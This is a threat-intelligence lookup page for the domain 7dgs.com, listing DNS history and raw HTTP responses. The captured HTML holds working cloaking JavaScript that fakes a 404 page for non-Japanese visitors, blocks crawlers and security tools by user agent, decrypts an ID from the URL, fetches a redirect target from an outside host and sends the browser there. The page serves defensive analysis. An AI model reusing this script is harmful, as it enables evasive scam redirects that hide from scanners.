Help
RSS
API
Feed
Maltego
Contact
Domain > 7dgs.com
×
More information on this domain is in
AlienVault OTX
Is this malicious?
Yes
No
DNS Resolutions
Date
IP Address
2022-08-03
54.178.244.226
(
ClassC
)
2025-10-16
150.5.146.120
(
ClassC
)
Port 80
HTTP/1.1 301 Moved PermanentlyServer: nginxDate: Thu, 16 Oct 2025 21:18:42 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveLocation: https://7dgs.com/Strict-Transport-Security: max-age31536000 html>head>title>301 Moved Permanently/title>/head>body>center>h1>301 Moved Permanently/h1>/center>hr>center>nginx/center>/body>/html>
Port 443
HTTP/1.1 200 OKServer: nginxDate: Thu, 16 Oct 2025 21:18:43 GMTContent-Type: text/html; charsetUTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingStrict-Transport-Security: max-age31536000 !DOCTYPE html>html langja>head> meta charsetUTF-8> title>404 Not Found/title> style> body { font-family: sans-serif; text-align: center; padding: 50px; } small { color: #888; } .a-loading-overlay { position: fixed; z-index: 10000; width: 90%; max-width: 300px; height: 160px; left: 50%; top: 50%; transform: translate(-50%, -50%); background: #121111c9; border-radius: 10px; display: flex; flex-direction: column; align-items: center; justify-content: center; padding: 20px; box-sizing: border-box; } .spinner { width: 40px; height: 40px; border: 5px solid #fff; border-top: 5px solid #3498db; border-radius: 50%; animation: spin 1s linear infinite; margin-bottom: 10px; } #countdown { color: #fff; font-size: 16px; text-align: center; word-break: break-word; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } /style>/head>body> div classa-loading-overlay> div classspinner>/div> span idcountdown>/span>/div> script> const AES_KEY 123456789zxcvbnm; // ✅ AES-128(16 字节) const blockedUAs googlebot, bingbot, slurp, duckduckbot, baiduspider, yandex, sogou, exabot, facebot, ia_archiver, curl, wget, python, httpclient, go-http-client, wechat, micromessenger, qq, line, discordbot, telegram, scrapy, robot, crawler, spider, bot, archive.org ; const blockedReferers t.co, facebook.com, twitter.com, line.me, discord, telegram; window.addEventListener(load, async () > { try { // const country US || UNKNOWN; if (country ! JP) { document.body.innerHTML ` h1>ページが見つかりませんでした/h1> p>指定されたURLは存在しないか、現在利用できません。/p> hr>small>Cloud Edge CDN/small> `; return; } const ua navigator.userAgent.toLowerCase(); const ref document.referrer.toLowerCase(); if (blockedUAs.some(bot > ua.includes(bot))) { return; } if (ref && blockedReferers.some(r > ref.includes(r))) { return; } const path window.location.pathname.split(/).filter(Boolean); if (path.length 1) { return; } const encryptedSegment pathpath.length - 1.split(.)0; const base64 encryptedSegment.replace(/-/g, +).replace(/_/g, /); const encryptedBytes Uint8Array.from(atob(base64), c > c.charCodeAt(0)); const iv encryptedBytes.slice(0, 16); const actualEncrypted encryptedBytes.slice(16); const keyBytes new TextEncoder().encode(AES_KEY); const cryptoKey await crypto.subtle.importKey( raw, keyBytes, { name: AES-CBC }, false, decrypt ); const decryptedBuffer await crypto.subtle.decrypt( { name: AES-CBC, iv: iv }, cryptoKey, actualEncrypted ); const decryptedText new TextDecoder().decode(decryptedBuffer).replace(/\u0000+$/, ); const id decryptedText.split(:)1; if (!id) throw new Error(Invalid ID format); // 🔗 调用 API 获取跳转目标 const apiUrl `https://enrecstudios.com/res.php?siteName${encodeURIComponent(id)}`; const res await fetch(apiUrl); const data await res.json(); const siteUrl data?.data?.siteUrl; if (!siteUrl) throw new Error(No siteUrl); // ✅ 模拟跳转(真实跳转可接入 API) window.location.href siteUrl; } catch (err) { console.error(Decryption or redirect failed:, err); document.body.innerHTML ` h1>ページが見つかりませんでした/h1> p>指定されたURLは存在しないか、現在利用できません。/p> hr>small>Cloud Edge CDN/small> `; } }); /script>/body>
View on OTX
|
View on ThreatMiner
Please enable JavaScript to view the
comments powered by Disqus.
Data with thanks to
AlienVault OTX
,
VirusTotal
,
Malwr
and
others
. [
Sitemap
]